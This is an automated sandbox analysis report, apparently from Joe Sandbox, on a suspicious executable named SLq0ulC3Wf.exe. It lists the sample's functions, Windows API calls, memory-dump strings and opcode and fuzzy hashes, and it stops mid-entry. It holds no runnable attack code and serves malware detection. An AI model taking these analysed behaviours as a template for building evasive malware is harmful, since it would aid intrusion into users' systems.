API String ID:
Opcode ID: fef329543352382f38cf69345dff30bc1f23440d0f96ef4a36a58c6a9bf9496e
Instruction ID: 26cd1a910a4fedf7edf8f752a89c5ff52ad281c99861b5a8b18447921fa94fe0
Opcode Fuzzy Hash: fef329543352382f38cf69345dff30bc1f23440d0f96ef4a36a58c6a9bf9496e
Instruction Fuzzy Hash: 5B511BB4E002198FDB18CFA9C5849AEFBB6FF89304F248169D418AB255D7319942CFA5

Analysis Process: SLq0ulC3Wf.exePID: 7636, Parent PID: 7416COMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	5.5%
Signature Coverage:	8.6%
Total number of Nodes:	128
Total number of Limit Nodes:	9

Executed Functions

Function 004180A3 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00418115

Memory Dump Source

Source File: 00000007.00000002.1717366921.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_SLq0ulC3Wf.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 59b5cafe8b8fd6d07c39e63762b9fec7350b35de5028b9d2df728583a4312457
Instruction ID: 82db2e993d1e07e1d7644de47204ba0bce80a130be887ef06817bc54f773b708
Opcode Fuzzy Hash: 59b5cafe8b8fd6d07c39e63762b9fec7350b35de5028b9d2df728583a4312457
Instruction Fuzzy Hash: 720175B1E0010DB7DF10DBE1DC42FDEB7789B14304F0082AAE90897241FA35EB598755

Function 0042CF83 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CFBA

Memory Dump Source

Source File: 00000007.00000002.1717366921.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_SLq0ulC3Wf.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 126009d24afb20c3db14ebf9b93e98afc2f998a1a0808f16c54d58967ed1d910
Instruction ID: 6d2509923731cc3402650cfd5fc60feb34918fdb874d2f8a5cff3782f44a3a58
Opcode Fuzzy Hash: 126009d24afb20c3db14ebf9b93e98afc2f998a1a0808f16c54d58967ed1d910
Instruction Fuzzy Hash: C3E04F762002147BC110BA5ADC41F9B77ACDFC5714F004459FA08A7141C671B91187F5

Function 01A02B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A02B6A

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b82617884ee865f82e506ad5700e6e67bfef89da3d41816c4238568f30188b7b
Instruction ID: c83dc4205a9ccc2488157488bce9782db904f394fe0b48f070175f04bc6e7173
Opcode Fuzzy Hash: b82617884ee865f82e506ad5700e6e67bfef89da3d41816c4238568f30188b7b
Instruction Fuzzy Hash: 9F90026224240003410571584414616500A97E1241F56C021E1014590DC62989916225

Function 01A02DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A02DFA

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e9159239d80417a94c17588b300123383085cb77d68ecb8baed3917e245efb3a
Instruction ID: deb40ab89a5b528aba9c3b2524e557e55b7961feaec6c069938ddd173c0741e7
Opcode Fuzzy Hash: e9159239d80417a94c17588b300123383085cb77d68ecb8baed3917e245efb3a
Instruction Fuzzy Hash: 8390023224140413D11171584504707100997D1281F96C412A0424558DD75A8A52A221

Function 01A02C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A02C7A

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fbe00a3b480d2bf76781e3d244b4831350fa0c052067c31c7f644dea76526c51
Instruction ID: 08c036d7fe9aadb34272fa107234c4482d69658f048fc41578896e15570820e4
Opcode Fuzzy Hash: fbe00a3b480d2bf76781e3d244b4831350fa0c052067c31c7f644dea76526c51
Instruction Fuzzy Hash: 3D90023224148803D1107158840474A100597D1341F5AC411A4424658DC79989917221

Function 01A035C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A035CA

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5f9ca542dc688b55e0e6b840179443d0bd97e7d5e94e1af4e36c77b53477aa2a
Instruction ID: 96ba6c4b2d6d3e3d719a8c08a3b791630517078f0efd4811a7bf73b89d405685
Opcode Fuzzy Hash: 5f9ca542dc688b55e0e6b840179443d0bd97e7d5e94e1af4e36c77b53477aa2a
Instruction Fuzzy Hash: EB90023264550403D10071584514706200597D1241F66C411A0424568DC7998A5166A2

Function 00414903 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(-631756,00000111,00000000,00000000), ref: 0041497A

Strings

-631756, xrefs: 0041496F, 00414979, 0041498A
-631756, xrefs: 00414981, 00414984

Memory Dump Source

Source File: 00000007.00000002.1717366921.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_SLq0ulC3Wf.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: -631756$-631756
API String ID: 1836367815-4099882158
Opcode ID: 36470c14ba36b4980fd4826332faee9524f86f03cea398697e1d2a72b88f1c4c
Instruction ID: 6c16ec639d15a14678b420446187d56407629ff0680608ba19bbe3a6ddb407f6
Opcode Fuzzy Hash: 36470c14ba36b4980fd4826332faee9524f86f03cea398697e1d2a72b88f1c4c
Instruction Fuzzy Hash: BA012BB2D4021C7EDB10AAE59C81DEF7B7CDF41398F408129FA0467201D67C4E0687A1

Function 0042D2F3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,20F845C7,00000007,00000000,00000004,00000000,00417925,000000F4), ref: 0042D332

Memory Dump Source

Source File: 00000007.00000002.1717366921.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_SLq0ulC3Wf.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 1c866616523e51831a820be1be8ce7b11f78220390593804b3664b45530813a9
Instruction ID: fc4ede9bb63be3662ecc74f3f49d82a7fe2a18f936bc3bf2dd7dd97dc60d5dfe
Opcode Fuzzy Hash: 1c866616523e51831a820be1be8ce7b11f78220390593804b3664b45530813a9
Instruction Fuzzy Hash: ABE06DB12002147BD614EF5ADC41FAB33ACEFC5710F404419FE08A7245C671B9118AB9

Function 0042D2A3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041EE6B,?,?,00000000,?,0041EE6B,?,?,?), ref: 0042D2E2

Memory Dump Source

Source File: 00000007.00000002.1717366921.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_SLq0ulC3Wf.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9e06ff782628825aa587294ec74bb5db90083e6f603c665925345a8da200af64
Instruction ID: f0c058ad6ff32a825be29561732266307be72f8bb1a7a8645308030742660ac0
Opcode Fuzzy Hash: 9e06ff782628825aa587294ec74bb5db90083e6f603c665925345a8da200af64
Instruction Fuzzy Hash: ACE092B22002147BD614EF5ADC41FAF37ACEFC9710F004419FE08A7282C670B9108BB9

Function 0042D343 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,C6CE2DA4,?,?,C6CE2DA4), ref: 0042D377

Memory Dump Source

Source File: 00000007.00000002.1717366921.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_SLq0ulC3Wf.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 6fe5a5a72d94321802cffe50a5f7811dbcce8a98ad70430984f235a63fa9eae5
Instruction ID: 18cf45479af2ecb15cb27987815ceb981d2a19fdd6fe511a06b4b29b7cf97ed1
Opcode Fuzzy Hash: 6fe5a5a72d94321802cffe50a5f7811dbcce8a98ad70430984f235a63fa9eae5
Instruction Fuzzy Hash: 9AE086716002147BD210FA5AEC41FDB775CDFC5714F00841AFB08A7281C674B91187F5

Function 01A02C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A02C24

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a6ed88fd8685236942a352d4f654261eac4a3a74ee4915d384a11aa7885bfeec
Instruction ID: 73836d67cb56048d052a7b918ce909f0157fab202904641d4b7d10109320ed03
Opcode Fuzzy Hash: a6ed88fd8685236942a352d4f654261eac4a3a74ee4915d384a11aa7885bfeec
Instruction Fuzzy Hash: 39B09B729415C5C6DA12E764560C717790077D1741F16C076D2030685F873CC5D1E275

Non-executed Functions

Function 01A42349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

@, xrefs: 01A42B74
minkernel\ntdll\ldrinit.c, xrefs: 01A43187
TracingFlags, xrefs: 01A42549
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01A43176
UseImpersonatedDeviceMap, xrefs: 01A4251C
ShutdownFlags, xrefs: 01A424A1
MinimumStackCommitInBytes, xrefs: 01A42BB0
ExecuteOptions, xrefs: 01A425A0
UnloadEventTraceDepth, xrefs: 01A424C0
CFGOptions, xrefs: 01A42967
RaiseExceptionOnPossibleDeadlock, xrefs: 01A42579
@, xrefs: 01A42942
MaxLoaderThreads, xrefs: 01A424EC
DisableHeapLookaside, xrefs: 01A4246D
FrontEndHeapDebugOptions, xrefs: 01A42489
GlobalFlag, xrefs: 01A42F3F, 01A43059
MaxDeadActivationContexts, xrefs: 01A42D82
LdrpInitializeExecutionOptions, xrefs: 01A4317D
DisableExceptionChainValidation, xrefs: 01A4275F
GlobalFlag2, xrefs: 01A42FC0

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: bcb84e11420f8440e3fb10691a5e7408bef4756b9e8cb2bc36948a2156c4aa52
Instruction ID: b64f41a8d92f1ea5856ae266012b00a4d989ede241e4412f521ec2bbd7817853
Opcode Fuzzy Hash: bcb84e11420f8440e3fb10691a5e7408bef4756b9e8cb2bc36948a2156c4aa52
Instruction Fuzzy Hash: 42927D71604742ABE721DF29D880B6BBBE8BFC4754F04492EFA98D7251D770E844CB92

Function 019F8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A354E2
Invalid debug info address of this critical section, xrefs: 01A354B6
Thread is in a state in which it cannot own a critical section, xrefs: 01A35543
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A3540A, 01A35496, 01A35519
double initialized or corrupted critical section, xrefs: 01A35508
corrupted critical section, xrefs: 01A354C2
Address of the debug info found in the active list., xrefs: 01A354AE, 01A354FA
Critical section address, xrefs: 01A35425, 01A354BC, 01A35534
8, xrefs: 01A352E3
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A354CE
undeleted critical section in freed memory, xrefs: 01A3542B
Critical section address., xrefs: 01A35502
Thread identifier, xrefs: 01A3553A
Critical section debug info address, xrefs: 01A3541F, 01A3552E

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: e2d11023c162b62ea0776ac9cad5023aea702ca9b671a9b55eefd4c83112cfdf
Instruction ID: 688fd17f129f5799e35cd85bafd9afe0c5e26eea55a6013a55372c5b9ba6f67d
Opcode Fuzzy Hash: e2d11023c162b62ea0776ac9cad5023aea702ca9b671a9b55eefd4c83112cfdf
Instruction Fuzzy Hash: B1819CB0E40348AFDB20CF99C845BAEBBF9BB88B15F544119F508B7281D775A945CB90

Function 019F29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01A32498
RtlpResolveAssemblyStorageMapEntry, xrefs: 01A3261F
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01A32602
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01A325EB
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01A324C0
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01A32412
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01A32624
@, xrefs: 01A3259B
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01A322E4
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01A32409
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01A32506

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: f3a23a3b8103b2551ccb9e788edf35d186966a84ac52bf0589a80c53d8e7b074
Instruction ID: 2345c77c5c87ea8bb34158519f3cf55298016c0f9f1e70431a698f64e9a4d9e3
Opcode Fuzzy Hash: f3a23a3b8103b2551ccb9e788edf35d186966a84ac52bf0589a80c53d8e7b074
Instruction Fuzzy Hash: DC0260B1D00229AFDB21DB54CD80B99B7B8AF94704F4041EAA74DA7241DB31AF84CF99

Function 01A68B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

lsass.exe, xrefs: 01A68BA1
smss.exe, xrefs: 01A68B8B
svchost.exe, xrefs: 01A68B68
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 01A68BD0
DefaultBrowser_NOPUBLISHERID, xrefs: 01A68D00
heapType, xrefs: 01A68BCB
csrss.exe, xrefs: 01A68B80
SegmentHeap, xrefs: 01A68BE9
services.exe, xrefs: 01A68B96
runtimebroker.exe, xrefs: 01A68B73

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: e712e2147275c7e8ad259c7cf15981d2122ffce32547162b251c7854f2aca940
Instruction ID: 05158d8af8d4fb6823b2097af688cbfcbe60bda60e15c1e33ac98642bb71b1ca
Opcode Fuzzy Hash: e712e2147275c7e8ad259c7cf15981d2122ffce32547162b251c7854f2aca940
Instruction Fuzzy Hash: 4051E1715143019FC729DF598884BABBBECFF98340F14091DEA99C7284E778D508CBA2

Function 01A70274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

RtlReAllocateHeap, xrefs: 01A702BF, 01A70362
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 01A706EA
HEAP: , xrefs: 01A703A6, 01A704B5, 01A705DD, 01A70682, 01A706D9
About to reallocate block at %p to %Ix bytes, xrefs: 01A703BA
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 01A7069F
Just reallocated block at %p to %Ix bytes, xrefs: 01A705F1
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 01A704D3
HEAP[%wZ]: , xrefs: 01A70399, 01A704A8, 01A705D0, 01A70675, 01A706CC

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 51278f8268b1fd9aceda0ae735d3e9c24517ff2f1fb08c4e66b32b3256e2cc5c
Instruction ID: 89198bedde5a0f615b793aabfc062058a14a07bad7ac3522cf8e64f98ffcaadc
Opcode Fuzzy Hash: 51278f8268b1fd9aceda0ae735d3e9c24517ff2f1fb08c4e66b32b3256e2cc5c
Instruction Fuzzy Hash: 9ED1F435500685DFDB22DF69CA90AAEFBF1FF8A714F088059F54A9B252C734DA81CB14

Function 01A489B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: -*- final list of providers -*- , xrefs: 01A48B8F
HandleTraces, xrefs: 01A48C8F
VerifierDebug, xrefs: 01A48CA5
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01A48A67
VerifierDlls, xrefs: 01A48CBD
VerifierFlags, xrefs: 01A48C50
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01A48A3D

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: e17a4a95f3861c928942ab165518311b0b0ecf9620a6dce40cf4867ba0ace3fd
Instruction ID: 0184d8bc376cd22d6ddd905045fb4e594554b6f366e8e1c80947446865a1862c
Opcode Fuzzy Hash: e17a4a95f3861c928942ab165518311b0b0ecf9620a6dce40cf4867ba0ace3fd
Instruction Fuzzy Hash: BA912771A46342AFD722DFA8E8C0B6B77E8BBD4714F09041CFA496B252C778AC05C795

Function 019CEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

T, xrefs: 019CEB4E
LdrpResSearchResourceInsideDirectory Enter, xrefs: 019CEB58
LdrpResSearchResourceInsideDirectory Exit, xrefs: 019CEB6C
R, xrefs: 019CEB62
, xrefs: 019CF299
{, xrefs: 01A24643

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 0d76c67937ff19b3385bb9713df6cd885a228cfbd082d2fb77d209f0fd1f9327
Instruction ID: 2317c5a6cb15eb3e2f75c2d0c088bc592f76f178e857cd073dd0b97b08670730
Opcode Fuzzy Hash: 0d76c67937ff19b3385bb9713df6cd885a228cfbd082d2fb77d209f0fd1f9327
Instruction Fuzzy Hash: EFA24974A0562A8FDB64CF19CD88BA9BBB5BF89704F1442EDD94DA7251DB309E80CF01

Function 019F63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

_LdrpInitialize, xrefs: 01A340DF, 01A34141, 01A34205, 01A3425F
minkernel\ntdll\ldrinit.c, xrefs: 01A340E9, 01A3414B, 01A3420F, 01A34269
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 01A340D8
Process initialization failed with status 0x%08lx, xrefs: 01A3413A
Delaying execution failed with status 0x%08lx, xrefs: 01A34258
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 01A341FE

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: ef79dca4781939699b72073d84a3c432d03478da68d8e8a27ef384f01fdf5fbe
Instruction ID: 174b5f7e24e6eb1986d9cd5f29cead2cf17e191407b93532338a0d3b8825abea
Opcode Fuzzy Hash: ef79dca4781939699b72073d84a3c432d03478da68d8e8a27ef384f01fdf5fbe
Instruction Fuzzy Hash: 42914930F00751ABEB35EF58D984BAA7BA5BFC5B24F04012DFA087B292D7749842C790

Function 019B645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Getting the shim engine exports failed with status 0x%08lx, xrefs: 01A19A01
minkernel\ntdll\ldrinit.c, xrefs: 01A19A11, 01A19A3A
apphelp.dll, xrefs: 019B6496
LdrpInitShimEngine, xrefs: 01A199F4, 01A19A07, 01A19A30
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01A19A2A
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01A199ED

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: f63dbbb22f69c349f0dd5ba25be87d14153568cedadcc202ec7e0ad25f1f44fa
Instruction ID: 284ab111577d2438ff7247b369dc17e5b155d5a8597ccb9b4894d1233f238b93
Opcode Fuzzy Hash: f63dbbb22f69c349f0dd5ba25be87d14153568cedadcc202ec7e0ad25f1f44fa
Instruction Fuzzy Hash: 3051D0726083049FE720DF24D991FAB77E8FFC4648F44091DF689971A5D630E949CB92

Function 019FC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 01A38181, 01A381F5
minkernel\ntdll\ldrinit.c, xrefs: 019FC6C3
Loading import redirection DLL: '%wZ', xrefs: 01A38170
Unable to build import redirection Table, Status = 0x%x, xrefs: 01A381E5
LdrpInitializeProcess, xrefs: 019FC6C4
LdrpInitializeImportRedirection, xrefs: 01A38177, 01A381EB

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 5d313f492ea56606982e0f94b0d615554bd0f39f8979cef6944f718134c443c2
Instruction ID: 83acdef09fc5046844493527902c1fb025169db64a696715f35bf2a6f23b2b6a
Opcode Fuzzy Hash: 5d313f492ea56606982e0f94b0d615554bd0f39f8979cef6944f718134c443c2
Instruction Fuzzy Hash: A7310771748346AFC224EF68DD46E2AB7D4FFD4B10F04051CF9886B291D620ED05C7A2

Function 019F2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context, xrefs: 01A32165
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01A32180
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01A3219F
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01A321BF
RtlGetAssemblyStorageRoot, xrefs: 01A32160, 01A3219A, 01A321BA
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01A32178

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

